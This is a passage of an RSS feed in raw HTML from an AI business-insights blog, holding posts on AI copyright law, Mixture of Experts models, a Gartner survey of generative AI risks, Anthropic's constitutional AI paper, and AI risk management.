data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-fit zpimage-tablet-fallback-fit zpimage-mobile-fallback-fit hb-lightbox " data-lightbox-options="
                type:fullscreen,
                theme:dark"><figure role="none" class="zpimage-data-ref"><span class="zpimage-anchor" role="link" tabindex="0" aria-label="Open Lightbox" style="cursor:pointer;"><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Screenshot%202023-09-15%20at%209.35.54%20am.png" width="415" height="216.61" loading="lazy" size="fit" data-lightbox="true"/></picture></span></figure></div>
</div><div data-element-id="elm_u3Poqg1lQv2RoamY6O2c-A" data-element-type="text" class="zpelement zpelem-text "><style> [data-element-id="elm_u3Poqg1lQv2RoamY6O2c-A"].zpelem-text { border-radius:1px; } </style><div class="zptext zptext-align-left " data-editor="true"><div style="color:inherit;"><div style="color:inherit;"><p style="font-weight:400;text-indent:0px;">Powerful Generative AI systems can now generate stunning works of art, human-sounding text, and original music with the click of a button. This emerging technology holds immense promise, yet also surfaces intricate legal questions around copyright protections. How exactly should business leaders navigate the complex intersection between AI creation and existing copyright laws? A new research paper by legal scholar Dr Andres Guadamuz provides an enlightening analysis of this murky terrain.</p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">Guadamuz explains that modern AI relies heavily on a process called machine learning. Here, algorithms are fed vast troves of data—such as text corpuses, images, or audio samples - which they analyze to discern patterns and complete tasks. As the AI ingests more data, its performance improves. This data serves as the lifeblood for systems like ChatGPT, DALL-E 2, and Midjourney to produce their creative outputs.</p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">Of course, much of this training data consists of <span style="text-decoration:underline;">copyrighted works</span>. And herein lies the crux of the issue. Does an AI system infringe copyright through its utilization of such data? Are laws adequately calibrated to protect rights holders while also giving space for AI innovation to blossom? Guadamuz's research suggests we are in a legal gray zone lacking definitive precedents.</p><p style="font-weight:400;text-indent:0px;"><br></p><div style="color:inherit;"><p style="font-weight:400;text-indent:0px;">One fundamental question is whether the data used to train AI systems is eligible for copyright protection in the first place. Raw facts, statistics, and randomly generated information are not subject to copyright laws as they lack originality. However, some training datasets do involve meaningful creative choices by humans in the selection and arrangement of data. For example, a dataset of images captioned with descriptive text would have more original compilation than a random assortment of photos. These types of datasets with creative selection potentially clear the originality bar needed for copyright protection.</p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">That said, many AI models utilize purely factual data, public domain content, or freely licensed works that do not warrant copyright restrictions. According to Guadamuz's analysis, there are plenty of legitimate large-scale datasets available that teach AI systems without necessarily infringing on copyrighted source material. For instance, collections of Shakespeare's works or Van Gogh's paintings that are in the public domain can train models without legal concerns. Additionally, open access datasets like those under Creative Commons licenses offer content that creators have explicitly authorized for reuse. So there are many lawful paths for feeding data to AI systems without trampling on copyright protections.</p></div><p style="font-weight:400;text-indent:0px;"></p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">What about the actual training process? Here Guadamuz explains there is considerable uncertainty. Widely adopted machine learning methods require the AI to intake copies of data to extract patterns. Guadamuz notes this likely constitutes reproduction under copyright law and thus requires permission. However, the research highlights that temporary copies or text and data mining exceptions in some jurisdictions may permit this usage without authorization. The EU specifically created new exceptions for text and data mining for both non-commercial and commercial purposes. But their precise boundaries remain untested so far.</p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">Analyzing copyright issues around AI outputs adds further Complexity according to Guadamuz. Three main requirements must be fulfilled to show infringement: 1) violation of exclusive rights, 2) a causal connection to copyrighted inputs, and 3) substantially similar copying.</p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">Guadamuz suggests the second and third factors make infringement difficult to prove outside verbatim re-creations. With vast datasets and compressed latent representations, directly connecting outputs to specific inputs poses challenges. Similarly, replication of broad styles and ideas is not protected by copyright. Substantial similarity requires qualitatively important expressions to be copied. But Guadamuz notes that character copyright issues could arise with AI generations. He argues current fair dealing style exceptions around parody and pastiche may shield some AI outputs.</p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">In conclusion, Guadamuz paints a complex landscape filled with legal uncertainty. With few definitive court precedents so far, business leaders should closely track how laws are interpreted as AI copyright cases inevitably unfold. In the meantime, pursuing ethical approaches that respect rights holder interests appears prudent. Additionally, supporting collaborative initiatives and technological solutions like opt-out databases could help ease emerging tensions. But the path forward will require nuance, cooperation and openness to new models between all stakeholders.</p><p style="font-weight:400;text-indent:0px;"><br></p><p style="font-weight:400;text-indent:0px;">Footnotes:</p><p style="font-weight:400;text-indent:0px;"><span style="color:inherit;"><a href="https://papers.ssrn.com/sol3/papers.cfm?abstract_id=4371204" title="A Scanner Darkly: Copyright Liability and Exceptions in Artificial Intelligence Inputs and Outputs" rel="">A Scanner Darkly: Copyright Liability and Exceptions in Artificial Intelligence Inputs and Outputs</a> by </span><span style="color:inherit;">Dr Andres Guadamuz</span></p><p style="font-weight:400;text-indent:0px;"></p><div style="color:inherit;"><h1 style="font-size:28px;font-weight:500;text-indent:0px;"><br></h1></div><p style="font-weight:400;text-indent:0px;"></p></div></div></div>
</div></div></div></div></div></div> ]]></content:encoded><pubDate>Fri, 15 Sep 2023 09:33:55 +1000</pubDate></item><item><title><![CDATA[Is GPT-4 a Mixture of Experts Model? Exploring MoE Architectures for Language Models]]></title><link>https://www.nownextlater.ai/Insights/post/is-gpt-4-a-mixture-of-experts-model-exploring-moe-architectures-for-language-models</link><description><![CDATA[Rumors are swirling that GPT-4 may use an advanced technique called Mixture of Experts (MoE) to achieve over 1 tr parameters. This offers an opportunity to demystify MoE]]></description><content:encoded><![CDATA[<div class="zpcontent-container blogpost-container "><div data-element-id="elm_l-rxaOxTSYujeWk2-vZfMw" data-element-type="section" class="zpsection "><style type="text/css"></style><div class="zpcontainer-fluid zpcontainer"><div data-element-id="elm_xFH57oOkRPim79EfxOAuUg" data-element-type="row" class="zprow zprow-container zpalign-items- zpjustify-content- " data-equal-column=""><style type="text/css"></style><div data-element-id="elm_42e7Ken5TQirB4Tf08O0Jg" data-element-type="column" class="zpelem-col zpcol-12 zpcol-md-12 zpcol-sm-12 zpalign-self- "><style type="text/css"></style><div data-element-id="elm_khPg25WU59_le2ZHOQnl4g" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_khPg25WU59_le2ZHOQnl4g"] .zpimage-container figure img { width: 500px ; height: 229.84px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_khPg25WU59_le2ZHOQnl4g"] .zpimage-container figure img { width:500px ; height:229.84px ; } } @media (max-width: 767px) { [data-element-id="elm_khPg25WU59_le2ZHOQnl4g"] .zpimage-container figure img { width:500px ; height:229.84px ; } } [data-element-id="elm_khPg25WU59_le2ZHOQnl4g"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-medium zpimage-tablet-fallback-medium zpimage-mobile-fallback-medium hb-lightbox " data-lightbox-options="
                type:fullscreen,
                theme:dark"><figure role="none" class="zpimage-data-ref"><span class="zpimage-anchor" role="link" tabindex="0" aria-label="Open Lightbox" style="cursor:pointer;"><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Screenshot%202023-08-17%20at%202.15.32%20pm.png" width="500" height="229.84" loading="lazy" size="medium" alt="A sample of related models" data-lightbox="true"/></picture></span></figure></div>
</div><div data-element-id="elm_wydQABEFSfq69jt59vZzKw" data-element-type="text" class="zpelement zpelem-text "><style> [data-element-id="elm_wydQABEFSfq69jt59vZzKw"].zpelem-text { border-radius:1px; } </style><div class="zptext zptext-align-left " data-editor="true"><p><span style="color:inherit;">Rumors are swirling that GPT-4 may use an advanced technique called Mixture of Experts (MoE) to achieve over 1 trillion parameters. Although unconfirmed, these reports offer an opportunity to demystify MoE and explore why this architecture could allow the next generation of language models to efficiently scale to unprecedented size.<br><br><span style="font-family:&quot;Oswald&quot;, sans-serif;">What is Mixture of Experts? </span><br><br>In most AI systems, a single model is applied to all inputs. But MoE models have groups of smaller &quot;expert&quot; models, each with their own parameters. For every new input, an expert selector chooses the most relevant experts to process that data.<br><br>This means only a sparse subset of the total parameters are activated per input. So MoE models can pack in exponentially more parameters without a proportional explosion in computation.<br><br>For language tasks, some experts specialize in grammar, others learn factual knowledge, allowing MoE models to better handle the nuances of natural language. The selector dynamically routes each word to the best combination of experts.<br><br>So while an MoE model may contain trillions of total parameters via its many experts, only a tiny fraction need to be used for any given input. This allows unprecedented scale while maintaining efficiency.<br><br><span style="font-family:&quot;Oswald&quot;, sans-serif;">Pioneering MoE to Power Language AI</span><br><br>The core concept of MoE dates back decades, but only recently has progress in model parallelism and distributed training enabled its application to large language models. <br><br>Google has published notable results using MoE to achieve huge language models:<br><br></span></p><p style="margin-left:40px;"><span style="color:inherit;">1) <span style="font-family:&quot;Oswald&quot;, sans-serif;"><a href="https://arxiv.org/pdf/2101.03961.pdf" title="Switch Transformers" rel="">Switch Transformers</a></span> simplify MoE routing strategies. In experiments, they attain up to 8x faster training versus dense models on language tasks by intelligently allocating computation.</span></p><p style="margin-left:40px;"></p><p style="margin-left:40px;"><span style="color:inherit;"><br></span></p><p style="margin-left:40px;"><span style="color:inherit;">2) <span style="font-family:&quot;Oswald&quot;, sans-serif;"><a href="https://arxiv.org/abs/2112.06905" title="GLaM" rel="">GLaM</a></span> leverages MoE to reach 1.2 trillion parameters. With just 8% of its weights active per input, it outperforms the 175 billion parameter GPT-3 on multiple language benchmarks. <br></span></p><p style="margin-left:40px;"></p><p style="margin-left:40px;"><span style="color:inherit;"><br></span></p><p>Between these two projects, we see MoE enables order-of-magnitude leaps in model capacity, capability, and efficiency. If GPT-4 utilizes MoE to hit 1+ trillion parameters as speculated, it suggests OpenAI has engineered solutions for training and deployment that overcome key scaling barriers.</p><p><span style="font-family:&quot;Oswald&quot;, sans-serif;"><br>The Upshot for Business Leaders <br></span></p><p><span style="font-family:&quot;Oswald&quot;, sans-serif;"><br></span></p><p>MoE presents a disruptive path to building AI systems with previously unfathomable levels of knowledge and versatility. Leveraging these capabilities productively and safely will require deep consideration.</p><p><br></p><p>As this technology continues advancing, business leaders should stay cognizant of developments in MoE and large language models, and keep in mind the following:</p><ul><li>MoE enables <span style="text-decoration:underline;">exponential gains in model capacity at constant computational cost</span> - expect rapid leaps in language AI.</li><li>Specialized experts <span style="text-decoration:underline;">can encode robust knowledge</span> - anticipate AI that is far more competent and wide-ranging. </li><li>However, <span style="text-decoration:underline;">risks rise</span> with capability - plan to implement strong controls and oversight for safety.</li></ul><p><br></p><p>While the details of GPT-4 remain unconfirmed, its scale may soon demonstrate the vast possibilities of MoE in language AI, for better or worse. A wise, measured approach to deploying such technology will be vital.</p></div>
</div><div data-element-id="elm_pzYYuSSKNULiHvI7QLl4zg" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_pzYYuSSKNULiHvI7QLl4zg"] .zpimage-container figure img { width: 800px ; height: 344.00px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_pzYYuSSKNULiHvI7QLl4zg"] .zpimage-container figure img { width:500px ; height:215.00px ; } } @media (max-width: 767px) { [data-element-id="elm_pzYYuSSKNULiHvI7QLl4zg"] .zpimage-container figure img { width:500px ; height:215.00px ; } } [data-element-id="elm_pzYYuSSKNULiHvI7QLl4zg"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-large zpimage-tablet-fallback-large zpimage-mobile-fallback-large "><figure role="none" class="zpimage-data-ref"><a class="zpimage-anchor" href="/aibooks" target="" rel=""><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Untitled%20design%20-4-.png" width="500" height="215.00" loading="lazy" size="large"/></picture></a></figure></div>
</div></div></div></div></div></div> ]]></content:encoded><pubDate>Thu, 17 Aug 2023 14:25:20 +1000</pubDate></item><item><title><![CDATA[Generative AI in Enterprises: Gartner's Survey Unveils Opportunities and Risks]]></title><link>https://www.nownextlater.ai/Insights/post/generative-ai-in-enterprises-gartner-s-survey-unveils-opportunities-and-risks</link><description><![CDATA[A new survey from Gartner has found that the availability of generative AI systems like ChatGPT is quickly becoming a top concern for enterprise risk management.]]></description><content:encoded><![CDATA[<div class="zpcontent-container blogpost-container "><div data-element-id="elm_j5demmQORoOF4Wg784Iazg" data-element-type="section" class="zpsection "><style type="text/css"></style><div class="zpcontainer-fluid zpcontainer"><div data-element-id="elm_1dJ36n6sQtei3VyaSuIQfQ" data-element-type="row" class="zprow zprow-container zpalign-items- zpjustify-content- " data-equal-column=""><style type="text/css"></style><div data-element-id="elm_VFXoZ9k7RTOGRPtyOd11VA" data-element-type="column" class="zpelem-col zpcol-12 zpcol-md-12 zpcol-sm-12 zpalign-self- "><style type="text/css"></style><div data-element-id="elm_n07Ggn9U0gyHL9ZqWal2MA" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_n07Ggn9U0gyHL9ZqWal2MA"] .zpimage-container figure img { width: 500px ; height: 223.54px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_n07Ggn9U0gyHL9ZqWal2MA"] .zpimage-container figure img { width:500px ; height:223.54px ; } } @media (max-width: 767px) { [data-element-id="elm_n07Ggn9U0gyHL9ZqWal2MA"] .zpimage-container figure img { width:500px ; height:223.54px ; } } [data-element-id="elm_n07Ggn9U0gyHL9ZqWal2MA"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-medium zpimage-tablet-fallback-medium zpimage-mobile-fallback-medium hb-lightbox " data-lightbox-options="
                type:fullscreen,
                theme:dark"><figure role="none" class="zpimage-data-ref"><span class="zpimage-anchor" role="link" tabindex="0" aria-label="Open Lightbox" style="cursor:pointer;"><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Screenshot%202023-08-10%20at%207.29.18%20am.png" width="500" height="223.54" loading="lazy" size="medium" alt="top five most cited emerging risks Q2 2023" data-lightbox="true"/></picture></span></figure></div>
</div><div data-element-id="elm_-7NthNw2SzOzETHrVXfwrg" data-element-type="text" class="zpelement zpelem-text "><style> [data-element-id="elm_-7NthNw2SzOzETHrVXfwrg"].zpelem-text { border-radius:1px; } </style><div class="zptext zptext-align-left " data-editor="true"><div style="color:inherit;"><p style="font-size:16px;font-weight:400;text-indent:0px;"><strong style="font-weight:600;"></strong></p><div style="color:inherit;"><p>A new survey from Gartner has found that the availability of generative AI systems like ChatGPT is quickly becoming a top concern for enterprise risk management. Out of 249 senior risk executives surveyed in Q2 2023, 66% cited generative AI as an emerging risk needing attention.</p><p><br></p><p>This reflects the rapid mainstreaming of AI systems that can generate original text, images, and code. While the technology promises benefits, it also poses new risks around data privacy, security, bias, and legal compliance.</p><p><br></p><p>According to Gartner, enterprises should take three main steps to manage generative AI risks:</p><p><br></p><p><span style="font-family:&quot;Oswald&quot;, sans-serif;">1) Assess Intellectual Property and Data Privacy Exposure</span></p><p><br></p><p>Sensitive data entered into public systems like ChatGPT can become part of the training dataset and end up in outputs seen by other users. This threatens privacy and intellectual property. Firms should issue guidelines against entering confidential data and carefully review any generative AI outputs.</p><p><br></p><p><span style="font-family:&quot;Oswald&quot;, sans-serif;">2) Mitigate Cybersecurity and Fraud Risks</span></p><p><br></p><p>Hackers are already using generative AI to create fake content and phishing scams at scale. Businesses should coordinate with cybersecurity teams to defend against threats like prompt injection attacks. They should also verify due diligence sources as generative models may fabricate plausible-sounding but false information.</p><p><br></p><p><span style="font-family:&quot;Oswald&quot;, sans-serif;">3) Evaluate Legal and Regulatory Obligations</span></p><p><br></p><p>Generative AI risks violating copyright and fair lending laws if biases exist in the models. Organizations must ensure transparency in AI use, perform impact assessments, and provide human oversight of outputs. Firms should monitor emerging regulations in jurisdictions and prepare accordingly.</p><p><br></p><p><br></p><p>Gartner recommends that legal, compliance, security, and technology leaders work together closely to build AI governance and controls that balance innovation with responsible use. Though regulations are still developing, proactive oversight of generative AI will reduce legal, reputational, and financial risks.</p><p><br></p><p>With powerful generative models now widely available, enterprises can no longer ignore the downsides. Assessing and mitigating risks will enable firms to tap the technology's benefits while avoiding pitfalls. But neglecting appropriate safeguards makes organizations vulnerable on many fronts.</p><p><br></p><p>Sources:</p><p><a href="https://www.gartner.com/en/newsroom/press-releases/2023-08-08-gartner-survey-shows-generative-ai-has-become-an-emerging-risk-for-enterprises" title="Gartner Survey Shows Generative AI Has Become an Emerging Risk for Enterprises " rel="">Gartner Survey Shows Generative AI Has Become an Emerging Risk for Enterprises </a><br></p><p></p><p><a href="https://www.gartner.com/en/newsroom/press-releases/2023-05-18-gartner-identifies-six-chatgpt-risks-legal-and-compliance-leaders-must-evaluate" title="Gartner Identifies Six ChatGPT Risks Legal and Compliance Leaders Must Evaluate" rel="">Gartner Identifies Six ChatGPT Risks Legal and Compliance Leaders Must Evaluate</a><br></p><p></p><p><a href="https://www.gartner.com/en/newsroom/press-releases/2023-03-01-gartner-identifies-four-critical-areas-for-legal-leaders-to-address-around-ai-regulation" title="Gartner Identifies Four Critical Areas for Legal Leaders to Address Around AI Regulation" rel="">Gartner Identifies Four Critical Areas for Legal Leaders to Address Around AI Regulation</a><br></p><p></p></div>
<p style="font-size:16px;font-weight:400;text-indent:0px;"></p></div><p></p></div>
</div></div></div></div></div></div> ]]></content:encoded><pubDate>Thu, 10 Aug 2023 07:26:27 +1000</pubDate></item><item><title><![CDATA[Training AI to Behave Ethically Through a "Constitution"]]></title><link>https://www.nownextlater.ai/Insights/post/training-ai-to-behave-ethically-through-a-constitution</link><description><![CDATA[Researchers at Anthropic recently published a paper demonstrating a constitutional AI technique. Their goal was to make the assistants helpful, while avoiding harmful, dangerous, or unethical content.]]></description><content:encoded><![CDATA[<div class="zpcontent-container blogpost-container "><div data-element-id="elm_lbGxtTp8S3O_b9nicwB4lg" data-element-type="section" class="zpsection "><style type="text/css"></style><div class="zpcontainer-fluid zpcontainer"><div data-element-id="elm_OVQ_DtuqQbOpcQVps6ENGg" data-element-type="row" class="zprow zprow-container zpalign-items- zpjustify-content- " data-equal-column=""><style type="text/css"></style><div data-element-id="elm_D5K9QWWPQbmaxXluKu8bFg" data-element-type="column" class="zpelem-col zpcol-12 zpcol-md-12 zpcol-sm-12 zpalign-self- "><style type="text/css"></style><div data-element-id="elm_6OQStO5uJODr8lwRqgAjFA" data-element-type="image" class="zpelement zpelem-image "><style> @media (min-width: 992px) { [data-element-id="elm_6OQStO5uJODr8lwRqgAjFA"] .zpimage-container figure img { width: 1090px ; height: 469.38px ; } } @media (max-width: 991px) and (min-width: 768px) { [data-element-id="elm_6OQStO5uJODr8lwRqgAjFA"] .zpimage-container figure img { width:723px ; height:311.34px ; } } @media (max-width: 767px) { [data-element-id="elm_6OQStO5uJODr8lwRqgAjFA"] .zpimage-container figure img { width:415px ; height:178.71px ; } } [data-element-id="elm_6OQStO5uJODr8lwRqgAjFA"].zpelem-image { border-radius:1px; } </style><div data-caption-color="" data-size-tablet="" data-size-mobile="" data-align="center" data-tablet-image-separate="false" data-mobile-image-separate="false" class="zpimage-container zpimage-align-center zpimage-size-fit zpimage-tablet-fallback-fit zpimage-mobile-fallback-fit hb-lightbox " data-lightbox-options="
                type:fullscreen,
                theme:dark"><figure role="none" class="zpimage-data-ref"><span class="zpimage-anchor" role="link" tabindex="0" aria-label="Open Lightbox" style="cursor:pointer;"><picture><img class="zpimage zpimage-style-none zpimage-space-none " src="/Screenshot%202023-08-09%20at%206.18.47%20pm.png" width="415" height="178.71" loading="lazy" size="fit" alt="Constitutional AI (CAI) process" data-lightbox="true"/></picture></span></figure></div>
</div><div data-element-id="elm_TM6zCOa7Se6G3gYtumtXFQ" data-element-type="text" class="zpelement zpelem-text "><style> [data-element-id="elm_TM6zCOa7Se6G3gYtumtXFQ"].zpelem-text { border-radius:1px; } </style><div class="zptext zptext-align-left " data-editor="true"><div style="color:inherit;"><p>As artificial intelligence becomes more advanced, researchers are exploring new techniques to ensure these systems remain helpful, honest, and harmless. One approach called &quot;constitutional AI&quot; relies on providing AI models with a set of principles to govern their behavior, much like a constitution guides human institutions.</p><p><br></p><p>Researchers at Anthropic recently published a paper demonstrating a constitutional AI technique to train natural language AI assistants. Their goal was to make the assistants helpful, while avoiding harmful, dangerous, or unethical content. Critically, they aimed to do this without any direct human oversight labeling specific model outputs as problematic.</p><p><br></p><p>Instead, the researchers provided a simple &quot;constitution&quot; - a set of natural language rules like &quot;be kind, ethical, and non-violent.&quot; They then used these rules to steer the model's behavior through a multi-stage process:</p><p><br></p><ol><li><span style="font-family:&quot;Oswald&quot;, sans-serif;">Self-Critique and Revision</span></li></ol><p><br></p><p>The researchers first generated sample conversations between a human and an AI assistant. They then asked the assistant model to critique its own problematic responses based on violations of principles from the constitution.</p><p>Next, they prompted the model to revise those responses to remove any harmful content, creating a new annotated dataset. For example, the model might revise a racist response to promote equality instead.</p><p><br></p><ol start="2"><li><span style="font-family:&quot;Oswald&quot;, sans-serif;">Supervised Learning</span></li></ol><p><br></p><p>The researchers then used this revised dataset to fine-tune the model parameters, so it learns to avoid certain types of harmful responses. This &quot;bootstraps&quot; the model's capabilities based on critiquing and revising its past mistakes.</p><p><br></p><ol start="3"><li><span style="font-family:&quot;Oswald&quot;, sans-serif;">AI Feedback for Reinforcement Learning</span></li></ol><p><br></p><p>Finally, the researchers had the AI generate reward signals to reinforce harmless behavior. They created fake conversations with good and bad responses. The AI then scored each response by how well it followed the constitution's principles.</p><p><br></p><p>They used these AI-generated scores to further fine-tune the model to maximize its &quot;rewards&quot; for behaving ethically. This stage was analogous to reinforcement learning from human feedback.</p><p><br></p><p>The researchers found this approach produced AI assistants that were less harmful and more transparent than systems trained only with human oversight. For example, the models learned to engage thoughtfully with sensitive topics instead of just shutting down conversations.</p><p><br></p><p>The study demonstrates the promise of constitutional AI. By encoding principles directly in natural language rules, researchers gained precision and interpretability compared to labeled training data. This technique also lowers the bar for experimentation, since new principles can quickly alter model behavior without human feedback.</p><p><br></p><p>However, the study relied on human guidance to make the assistant helpful, not just harmless. Removing human oversight entirely could enable unforeseen failures. The researchers stress that some focused, high-quality human oversight is still crucial for reliability.</p><p><br></p><p>Nonetheless, constitutional AI offers a template for training models that behave according to transparent, auditable principles. It also suggests the synergy between different AI techniques - in this case, self-supervision and reinforcement learning - can produce systems greater than the sum of their parts.</p><p><br></p><p>For business leaders, this study is a reminder that AI aligned with human values may require creative solutions. Methods like constitutional AI can potentially scale ethics throughout the AI development lifecycle - from design to training to deployment. But businesses must also know when to maintain human oversight over autonomous systems.</p><p><br></p><p>As AI grows more advanced and ubiquitous, techniques blending human guidance with self-supervision will likely be critical. Constitutional AI provides one model of highly legible and focused human oversight. The principles encoded in an AI's &quot;constitution&quot; will shape its goals and behavior. This research illustrates the importance of choosing those founding principles with care.</p><p><br></p><p>Sources:</p><p><a href="https://arxiv.org/pdf/2212.08073.pdf" title="arxiv" rel="">arxiv</a><br></p><p></p></div><p></p></div>
</div></div></div></div></div></div> ]]></content:encoded><pubDate>Wed, 09 Aug 2023 18:22:48 +1000</pubDate></item><item><title><![CDATA[Artificial Intelligence Risk Management]]></title><link>https://www.nownextlater.ai/Insights/post/Artificial-Intelligence-Risk-Management</link><description><![CDATA[<img align="left" hspace="5" src="https://www.nownextlater.ai/AI risk management.jpg"/>Are you looking to adopt Artificial Intelligence in your organization? Do you have a risk management framework in place?]]></description><content:encoded><![CDATA[<div class="zpcontent-container blogpost-container "><div data-element-id="elm_K2KQj8mMTHeKL0rAjUMUFw" data-element-type="section" class="zpsection "><style type="text/css"></style><div class="zpcontainer-fluid zpcontainer"><div data-element-id="elm_8pK_lemXRSqXrJkXT9FF7Q" data-element-type="row" class="zprow zprow-container zpalign-items- zpjustify-content- " data-equal-column=""><style type="text/css"></style><div data-element-id="elm_oV_T-AOtTD62aE31obIo0A" data-element-type="column" class="zpelem-col zpcol-12 zpcol-md-12 zpcol-sm-12 zpalign-self- "><style type="text/css"></style><div data-element-id="elm_CO-64rUFnfBBTJDFydm_xw" data-element-type="codeSnippet" class="zpelement zpelem-codesnippet "><div class="zpsnippet-container"><div class="video-container"><iframe src="https://www.youtube.com/embed/JsbgGJ85yhU?modestbranding=1&rel=0&cc_load_policy=1&iv_load_policy=3&controls=0&disablekb=1" width="560" height="315" frameborder="0" allow="fullscreen" loading=“lazy” title="Artificial Intelligence Risk Management"></iframe></div>
</div></div><div data-element-id="elm_8dlhflOUTY6sHqucmVUUfg" data-element-type="text" class="zpelement zpelem-text "><style> [data-element-id="elm_8dlhflOUTY6sHqucmVUUfg"].zpelem-text { border-radius:1px; } </style><div class="zptext zptext-align-center " data-editor="true"><div><div style="text-align:left;"><div><div><div><div><div style="line-height:1.2;"><div><span style="font-size:14px;">Are you looking to adopt Artificial Intelligence in your organization? Do you have a risk management framework in place?</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">According to&nbsp;</span><a href="https://www.pwc.com/gx/en/issues/data-and-analytics/publications/artificial-intelligence-study.html" target="_blank" style="font-size:14px;text-align:center;">PwC’s Global Artificial Intelligence Study</a><span style="text-align:justify;font-size:14px;">, the potential contribution of artificial intelligence to the global economy by 2030 is as high as 15 trillion US dollars. And according to&nbsp;</span><a href="https://www.mckinsey.com/capabilities/quantumblack/our-insights/the-state-of-ai-in-2022-and-a-half-decade-in-review" target="_blank" style="font-size:14px;text-align:center;">McKinsey</a><span style="text-align:justify;font-size:14px;">, AI adoption has more than doubled since 2017. However, it has plateaued between 50 and 60 percent for the past few years. AI capabilities, such as natural-language generation and computer vision, have also doubled.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">McKinsey has found that, while AI use has increased, risk mitigation to bolster digital trust has remained concerningly consistent since 2019.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">Today, there is a lot of fear, uncertainty, and doubt. Still, Artificial Intelligence is not even close to delivering a super intelligence, but highly specialized, what we call narrow AI, is transforming entire industries.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">A portfolio approach can help companies successfully unleash the power of machine intelligence. And a well-balanced portfolio will include some quick wins, focused, for example, on the optimization of a touch-point, and some long-term projects transforming end-to-end processes.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">The quick wins won’t transform your business, but they expose staff to the benefits and opportunities AI presents, and build confidence and momentum with key stakeholders like the board and management. For example, a quick win could involve a tool to schedule internal meetings, which allows you to use off-the-shelf packages, while you simultaneously build capability in areas such as hiring and training staff, large-scale data gathering, processing, and labeling.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">Training staff and gaining AI capabilities over time is important, but to reduce risk and drive some momentum, we suggest that, instead of front-loading your costs, you scale them slowly and consistently, making use of off-the-shelf solutions (with suitable adaptations) to help keep costs manageable.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">Data is without a doubt the key to machine learning projects, and the virtuous cycle of data collection means the rich get richer. So, a key risk of this new wave of transformation is the concentration of power in the hands of a few platforms. Knowing where to place your bets is tied to the data you can access that is of competitive advantage to your business. However, issues related to bias and potential misuse will be amplified if leaders have little or no understanding of how algorithms are built.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">Misconceptions can also be costly, with several studies suggesting that product-related AI innovation still struggles to deliver value. Knowing where to place innovation bets is less risky when management understands what types of innovations produce best returns.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">Misconceptions also occur in regards to what to centralize and why, and related operating model choices. An AI Era business looks very different from an Internet Era one, and this transformation requires a considered approach and AI knowledge. The product-innovation focus and incrementality of the agile internet companies is replaced by strategic data acquisition, unified data platforms, end-to-end process automation and the adoption of new roles within the business.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">Another misconception relates to expected job losses. Job numbers will remain about the same, but a rebalancing of roles will occur and you should expect to see fewer requirements for managerial roles as you scale AI within the organization.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">Many of the best performing Machine Learning models are often highly opaque. Explainable AI is becoming a key requirement and in high demand. Machine Learning requires its own governance frameworks, with key lines of defense established right up front.</span></div><div><span style="text-align:justify;font-size:14px;"><br></span></div><div><span style="text-align:justify;font-size:14px;">In addition, AI presents major ethical concerns related to privacy, bias, and discrimination. An organization must define the principles guiding their AI initiatives, ensuring they align with their values, industry, culture, geography, and other factors.</span></div><div><span style="font-size:14px;text-align:justify;"><br></span></div><div><span style="font-size:14px;text-align:justify;">A&nbsp;</span><a href="https://dash.harvard.edu/bitstream/handle/1/42160420/HLS%20White%20Paper%20Final_v3.pdf" target="_blank" style="font-size:14px;text-align:center;">2020 global report from Harvard University</a><span style="font-size:14px;text-align:justify;">&nbsp;evaluated 36 AI Ethics Frameworks from big companies, standards bodies, industry coalitions, and governments to identify eight common themes related to AI Ethics that you should consider:</span></div><span 